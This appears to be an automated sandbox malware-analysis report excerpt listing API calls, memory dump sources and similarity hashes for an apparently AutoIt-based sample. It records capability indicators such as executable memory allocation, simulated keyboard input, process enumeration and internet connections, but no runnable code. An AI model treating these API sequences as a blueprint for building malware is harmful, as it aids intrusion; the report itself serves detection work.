                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            • Opcode ID: f4236449bf2477f572d6ee0fe1ca7561fe0d2d262b9163173be41d6895b05407
                                                            • Instruction ID: dc7cb42b9083b1a2b37b22af9957d13d25aa819f27534e198be95f72e85fe3e5
                                                            • Opcode Fuzzy Hash: f4236449bf2477f572d6ee0fe1ca7561fe0d2d262b9163173be41d6895b05407
                                                            • Instruction Fuzzy Hash: 79D05B30910723DFD7355F31D94864677D9AF05351F11C93ED496DA2A4E7B4D4C0C650
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00364BD0,?,00364DEF,?,004252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00364C11
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00364C23
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            • Opcode ID: 97008a653b51b185932be2a196bb503862c0f4fbcfdfae59fe205e6ace80249f
                                                            • Instruction ID: fd8fcbb23a8e2709afa77a29285a4c4be43e9f948906a483dcb83b74d4511fba
                                                            • Opcode Fuzzy Hash: 97008a653b51b185932be2a196bb503862c0f4fbcfdfae59fe205e6ace80249f
                                                            • Instruction Fuzzy Hash: A0D01230911713DFD7216F71D948647B6DAEF09351F11CD3ED486DA2A4E6F4D480C654
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,003E1039), ref: 003E0DF5
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003E0E07
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: 7ef443137ae57e50f7884acb28757ef2a926965c57914b5ddc21276dc6a48508
                                                            • Instruction ID: abbb3468989213447fc16c44979599b77f6d1762a88838d0363605829d5e4271
                                                            • Opcode Fuzzy Hash: 7ef443137ae57e50f7884acb28757ef2a926965c57914b5ddc21276dc6a48508
                                                            • Instruction Fuzzy Hash: 87D0C231400B26DFC3224FB1C848382B2DAAF40341F118D3ED486D6190D7F4D8D0C604
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,003D8CF4,?,003EF910), ref: 003D90EE
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003D9100
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            • Opcode ID: 29206296b4b67380f91501006844953e566fec64170d2fc8382bb357a4742173
                                                            • Instruction ID: 5e652dd15887d81e51f44bfac44828cca7873abda4e2a21319e3dedd20ec9885
                                                            • Opcode Fuzzy Hash: 29206296b4b67380f91501006844953e566fec64170d2fc8382bb357a4742173
                                                            • Instruction Fuzzy Hash: 9AD01735510723CFDB229F32E85874676E8AF05351F13CA3FD48ADA690EAB4C880CA90
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: LocalTime__swprintf
                                                            • String ID: %.3d$WIN_XPe
                                                            • API String ID: 2070861257-2409531811
                                                            • Opcode ID: 6f3150c54c8ee4f933f0c96beb7160bb406626ee7d0a476928db07201388cde1
                                                            • Instruction ID: 7bdf92f2429b0020381a5085dad51bfac6222465f8651f8de341f10a677dd8ff
                                                            • Opcode Fuzzy Hash: 6f3150c54c8ee4f933f0c96beb7160bb406626ee7d0a476928db07201388cde1
                                                            • Instruction Fuzzy Hash: 32D01776844218FACB139A90D8888F9737CEB1A701F242562F906E2480E2668B94EA25
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6546b8b7e508d59faf13d46df6153334af70be74d63cdaf6bf240564dde1a2fc
                                                            • Instruction ID: 75c7434478536c31fe61a8054f759a715756ab06fe74d10f4ec6de7b5e2c204e
                                                            • Opcode Fuzzy Hash: 6546b8b7e508d59faf13d46df6153334af70be74d63cdaf6bf240564dde1a2fc
                                                            • Instruction Fuzzy Hash: 44C18174A04216EFCB15CFA5C884EAEBBF5FF88308B154598E909EB651D730DD41DB90
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 003DE0BE
                                                            • CharLowerBuffW.USER32(?,?), ref: 003DE101
                                                              • Part of subcall function 003DD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003DD7C5
                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 003DE301
                                                            • _memmove.LIBCMT ref: 003DE314
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                            • String ID:
                                                            • API String ID: 3659485706-0
                                                            • Opcode ID: ee578ed592658bb8970580a631f0aecacfcf33bcbefc4f7e6b1a2c4089690251
                                                            • Instruction ID: 713bf34ec8d645bd54d3951bab64149f0bae6587d0dbe6285491ac7b77ce3654
                                                            • Opcode Fuzzy Hash: ee578ed592658bb8970580a631f0aecacfcf33bcbefc4f7e6b1a2c4089690251
                                                            • Instruction Fuzzy Hash: 75C14876608301DFC716EF28C480A6ABBE4FF89714F14896EF8999B351D731E946CB81
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 003D80C3
                                                            • CoUninitialize.OLE32 ref: 003D80CE
                                                              • Part of subcall function 003BD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003BD5D4
                                                            • VariantInit.OLEAUT32(?), ref: 003D80D9
                                                            • VariantClear.OLEAUT32(?), ref: 003D83AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                            • String ID:
                                                            • API String ID: 780911581-0
                                                            • Opcode ID: 42caead308cf1b44881c19e7c9d0aa73c627fddc54bac914f86d4a2151ffa106
                                                            • Instruction ID: f1c1336f6a5de5d6913a32b4fce5dfec0d2499668b48889e310cf81e8984f0e8
                                                            • Opcode Fuzzy Hash: 42caead308cf1b44881c19e7c9d0aa73c627fddc54bac914f86d4a2151ffa106
                                                            • Instruction Fuzzy Hash: 77A1497A6047019FCB12DF54D481B2AB7E8BF89714F04885AF9999B3A1CB30FD05CB41
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            • Opcode ID: f6cb38742bbde1555bfccd38abbcb334dd3fb66c5ede75d32b38eb844ba3f1a7
                                                            • Instruction ID: 5fd3f07705aa7404cbcfd91b577db3e07fc4c27bed1a727175aed8afb8a8ae94
                                                            • Opcode Fuzzy Hash: f6cb38742bbde1555bfccd38abbcb334dd3fb66c5ede75d32b38eb844ba3f1a7
                                                            • Instruction Fuzzy Hash: F251CA747003419ECF26AF65D892AB9B3E99F44314F20C81FE686DBA93DB78D8448701
                                                            APIs
                                                            • GetWindowRect.USER32(0164EC78,?), ref: 003E9863
                                                            • ScreenToClient.USER32(00000002,00000002), ref: 003E9896
                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 003E9903
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID:
                                                            • API String ID: 3880355969-0
                                                            • Opcode ID: b830fefbf6cc2a3f7b719ab1961d8f776b3772340d6302b1c4dbd42ae735e7b3
                                                            • Instruction ID: 5134029084ab330596af01d64ca70d4e89d5928108c044c289e3101504fb0efc
                                                            • Opcode Fuzzy Hash: b830fefbf6cc2a3f7b719ab1961d8f776b3772340d6302b1c4dbd42ae735e7b3
                                                            • Instruction Fuzzy Hash: 16515F34A00258EFCF22DF25D880AAE7BB5FF45360F15826AF8559B2E1D770AD41CB90
                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003B9AD2
                                                            • __itow.LIBCMT ref: 003B9B03
                                                              • Part of subcall function 003B9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 003B9DBE
                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 003B9B6C
                                                            • __itow.LIBCMT ref: 003B9BC3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow
                                                            • String ID:
                                                            • API String ID: 3379773720-0
                                                            • Opcode ID: 5425c34b36e4636b67c41664fe13cdd88f10a2b150b98e9aabc455879d555e48
                                                            • Instruction ID: 8a2407781863a176dc340eee350bc567ca61c560ebe7fee79a90469c347dabd9
                                                            • Opcode Fuzzy Hash: 5425c34b36e4636b67c41664fe13cdd88f10a2b150b98e9aabc455879d555e48
                                                            • Instruction Fuzzy Hash: 5A419670A00308ABDF16EF54D845BFE7BB9EF44718F40406AFA05AB291DB709E44CBA1
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 003D69D1
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D69E1
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003D6A45
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D6A51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                            • String ID:
                                                            • API String ID: 2214342067-0
                                                            • Opcode ID: e59a33313aad496c02c3aeea1157b7c2de1a8d666b4660a8ca7ada9e77855f49
                                                            • Instruction ID: d2fce5d8bf8180337b7281bc9c1da5545343c04853619bef49ec19fed75ac7de
                                                            • Opcode Fuzzy Hash: e59a33313aad496c02c3aeea1157b7c2de1a8d666b4660a8ca7ada9e77855f49
                                                            • Instruction Fuzzy Hash: 30419175640200AFEB62AF64DC87F2A77E89F19B54F04C519FA59AF3C2DAB09D008791
                                                            APIs
                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,003EF910), ref: 003D64A7
                                                            • _strlen.LIBCMT ref: 003D64D9
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID:
                                                            • API String ID: 4218353326-0
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003CB89E
                                                            • GetLastError.KERNEL32(?,00000000), ref: 003CB8C4
                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003CB8E9
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003CB915
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003E88DE
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 003EAB60
                                                            • GetWindowRect.USER32(?,?), ref: 003EABD6
                                                            • PtInRect.USER32(?,?,003EC014), ref: 003EABE6
                                                            • MessageBeep.USER32(00000000), ref: 003EAC57
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            APIs
                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003C0B27
                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 003C0B43
                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003C0BA9
                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 003C0BFB
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            APIs
                                                            • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 003C0C66
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 003C0C82
                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 003C0CE1
                                                            • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 003C0D33
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003961FB
                                                            • __isleadbyte_l.LIBCMT ref: 00396229
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00396257
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0039628D
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 003E4F02
                                                              • Part of subcall function 003C3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003C365B
                                                              • Part of subcall function 003C3641: GetCurrentThreadId.KERNEL32 ref: 003C3662
                                                              • Part of subcall function 003C3641: AttachThreadInput.USER32(00000000,?,003C5005), ref: 003C3669
                                                            • GetCaretPos.USER32(?), ref: 003E4F13
                                                            • ClientToScreen.USER32(00000000,?), ref: 003E4F4E
                                                            • GetForegroundWindow.USER32 ref: 003E4F54
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 003C3C7A
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 003C3C88
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 003C3CA8
                                                            • CloseHandle.KERNEL32(00000000), ref: 003C3D52
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 420147892-0
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • GetCursorPos.USER32(?), ref: 003EC4D2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0039B9AB,?,?,?,?,?), ref: 003EC4E7
                                                            • GetCursorPos.USER32(?), ref: 003EC534
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0039B9AB,?,?,?), ref: 003EC56E
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            APIs
                                                              • Part of subcall function 003B810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003B8121
                                                              • Part of subcall function 003B810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003B812B
                                                              • Part of subcall function 003B810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B813A
                                                              • Part of subcall function 003B810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8141
                                                              • Part of subcall function 003B810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8157
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003B86A3
                                                            • _memcmp.LIBCMT ref: 003B86C6
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003B86FC
                                                            • HeapFree.KERNEL32(00000000), ref: 003B8703
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                            • String ID:
                                                            • API String ID: 1592001646-0
                                                            APIs
                                                            • __setmode.LIBCMT ref: 003809AE
                                                              • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003C7896,?,?,00000000), ref: 00365A2C
                                                              • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003C7896,?,?,00000000,?,?), ref: 00365A50
                                                            • _fprintf.LIBCMT ref: 003809E5
                                                            • OutputDebugStringW.KERNEL32(?), ref: 003B5DBB
                                                              • Part of subcall function 00384AAA: _flsall.LIBCMT ref: 00384AC3
                                                            • __setmode.LIBCMT ref: 00380A1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                            • String ID:
                                                            • API String ID: 521402451-0
                                                            • Opcode ID: 95f176a1a321d98cdba8a291daee49e444044b9aef80549b1639346872360dbc
                                                            • Instruction ID: 4c4aa11221df62732956886dc9de5610a1cd186710fd376aeb509d1a75d442d2
                                                            • Opcode Fuzzy Hash: 95f176a1a321d98cdba8a291daee49e444044b9aef80549b1639346872360dbc
                                                            • Instruction Fuzzy Hash: 87112731504345AFDB0BB3B49C469FE77AC9F45320F2041AAF2059F582EF31594647A1
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003D17A3
                                                              • Part of subcall function 003D182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003D184C
                                                              • Part of subcall function 003D182D: InternetCloseHandle.WININET(00000000), ref: 003D18E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 1463438336-0
                                                            • Opcode ID: 34669b47abb6e6395a4834fbde25ec4d611bcaf8111465b398d40711c37a38b7
                                                            • Instruction ID: d7f394dfbe5db68975d2ccfb29ed7c11badb8bacc8a785ce506e62069ceb38be
                                                            • Opcode Fuzzy Hash: 34669b47abb6e6395a4834fbde25ec4d611bcaf8111465b398d40711c37a38b7
                                                            • Instruction Fuzzy Hash: 40215076200605BFEB239F60EC41BBABBADFB88710F10412BF9559A790D7719911A7A0
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,003EFAC0), ref: 003C3A64
                                                            • GetLastError.KERNEL32 ref: 003C3A73
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 003C3A82
                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003EFAC0), ref: 003C3ADF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
